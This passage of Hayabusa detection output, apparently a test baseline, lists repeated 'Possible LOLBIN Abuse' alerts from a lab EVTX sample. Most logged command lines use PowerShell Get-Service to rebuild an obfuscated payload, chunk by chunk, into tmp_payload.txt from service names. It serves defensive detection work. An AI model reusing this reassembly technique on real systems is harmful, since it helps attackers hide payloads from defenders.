+2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
